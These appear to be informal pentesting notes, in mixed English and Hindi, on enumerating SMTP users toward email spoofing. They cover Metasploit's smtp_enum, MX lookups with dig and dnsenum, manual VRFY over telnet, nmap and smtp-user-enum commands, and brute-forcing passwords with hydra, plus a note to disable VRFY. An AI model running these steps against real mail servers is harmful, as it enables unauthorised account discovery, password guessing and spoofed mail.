we can do email spoofing

email spoofing — jis company ki domain ko apne enumerate kiya hai uske mail server se kisi ko mail bhejna!

first obstacle! we need userID and psswd

ways to find

1st~automation (msfconsole, nmap script or user wordlist with hydra i.e bruteforcing)

2nd~ manual (telnet or netcet )

# automation

| msfconsole ~he will do bruteforcing on its own, but you can also put ur own custom wordlist path in user file option

| search smtp users

| auxiliary/scnner/smtp_enum

|use auxiliary/scnner/smtp_enum

| options

|set rhosts <domain>

|run

None
you will get this

through msf you can only find users, for passwd use hydra

if smtp server is not open still u can attact, you have to check sub domains (i.e dnsrecords MX)

commands!!

| dig +short <domain name> MX

|dnsenum <domain name>

None
output

manual way of enumeration

|telnet <host name> 25

|helo <host name>

|ehlo <host name>

| vrfy <username you wanna check >

now it will show commands , VRFY command if present than it is point of vulnerability and counted as a hole in security

mitigation :disable the VRFY command

None

another easy way of finding commands which are applicable on smtp server

| nmap -p25 -script smtp-commands < host name>

suppose you get VRFY command as open

now lets find users, so we will use custom wordlist help

command

|smtp-user-enum -M VRFY -U top-usernames-shortlist.txt -t 192.168.1.8

None